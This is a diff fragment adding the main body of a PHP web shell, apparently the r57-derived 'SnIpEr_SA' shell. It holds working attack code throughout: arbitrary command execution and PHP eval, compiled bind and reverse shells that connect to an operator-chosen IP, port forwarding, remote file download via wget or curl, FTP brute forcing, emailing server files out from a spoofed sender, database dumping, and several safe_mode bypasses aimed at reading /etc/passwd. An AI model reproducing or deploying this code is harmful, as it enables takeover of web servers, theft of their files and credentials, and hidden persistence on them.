+echo "<br>".ws(2)."ÇáãÓÇÍÉ ÇáÎÇáíå : <b>".view_size($free)."</b> ÇáãÓÇÍÉ ÇáßáíÉ: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=#CCCCCC><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=#2279D9><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else
+  {
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else
+  {
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+     @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+     @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text302'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
